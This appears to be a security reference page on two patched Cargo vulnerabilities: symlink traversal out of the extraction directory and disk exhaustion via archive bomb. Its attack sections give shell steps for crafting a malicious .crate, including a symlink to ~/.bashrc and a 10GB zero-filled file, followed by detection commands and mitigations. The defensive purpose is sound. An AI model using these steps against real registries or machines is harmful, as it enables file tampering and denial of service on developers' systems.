Cargo Crate Extraction Attacks
Prerequisites
- Ability to publish a crafted crate to crates.io with a manipulated .crate archive
- The victim must download the crate via cargo build, cargo fetch, or cargo install
- For symlink attacks: the target operating system must support symbolic links
Attack Scenarios
Symlink Traversal to Overwrite Arbitrary Files (CVE-2022-36113)
An attacker crafts a .crate archive containing a symbolic link that points to a location outside the expected extraction directory. When Cargo extracts the crate, it follows the symlink and writes attacker-controlled content to an arbitrary file on the victim's filesystem. This can overwrite configuration files, inject code into other projects, or modify shell startup scripts.
# The attacker manually constructs a .crate tarball
# containing a symlink that escapes the extraction directory
mkdir -p evil-crate-0.1.0/src
echo 'fn main() {}' > evil-crate-0.1.0/src/main.rs
cat > evil-crate-0.1.0/Cargo.toml << 'EOF'
[package]
name = "evil-crate"
version = "0.1.0"
edition = "2021"
EOF
# Create a symlink pointing outside the extraction directory
cd evil-crate-0.1.0
ln -s ../../../.bashrc bashrc_link
# Package into a tarball (bypassing normal cargo package)
cd ..
tar czf evil-crate-0.1.0.crate evil-crate-0.1.0/
# Cargo downloads and extracts the crate to:
# ~/.cargo/registry/src/index.crates.io-*/evil-crate-0.1.0/
#
# The symlink bashrc_link -> ../../../.bashrc
# could allow a subsequent file write to overwrite ~/.bashrc
cargo install evil-crate
Disk Space Exhaustion via Archive Bomb (CVE-2022-36114)
An attacker publishes a crate whose .crate archive contains highly compressed data that expands to an enormous size when extracted, exhausting available disk space. This can cause denial of service on build servers, CI/CD systems, or developer machines.
# Create a file with highly repetitive content that compresses well
# A few KB compressed can expand to many GB
dd if=/dev/zero bs=1M count=10240 > evil-crate-0.1.0/src/data.bin
# The resulting .crate file is small but extracts to 10GB+
tar czf evil-crate-0.1.0.crate evil-crate-0.1.0/
cargo build
# Error: No space left on device
# The CI/CD runner or developer machine runs out of disk
Detection
Check Cargo version for known patches
Verify that the installed version of Cargo includes patches for CVE-2022-36113 and CVE-2022-36114 (fixed in Rust 1.64.0).
cargo --versionMonitor disk usage during builds
Set up disk usage monitoring to detect sudden spikes during cargo build operations that could indicate an archive bomb.
# Monitor disk usage in the cargo registry during builds
watch -n 1 'du -sh ~/.cargo/registry/src/ 2>/dev/null'
Scan for symlinks in extracted crates
Check for unexpected symbolic links in the cargo registry source directory.
find ~/.cargo/registry/src/ -type l -lsMitigation
- Update Rust and Cargo to version 1.64.0 or later, which includes patches for both CVEs
- Set disk quotas on build environments to limit the impact of archive bombs
- Use containerized build environments with limited disk space allocation
- Monitor disk usage in CI/CD pipelines and fail builds that exceed thresholds
- Regularly audit the cargo registry cache for unexpected symlinks or large files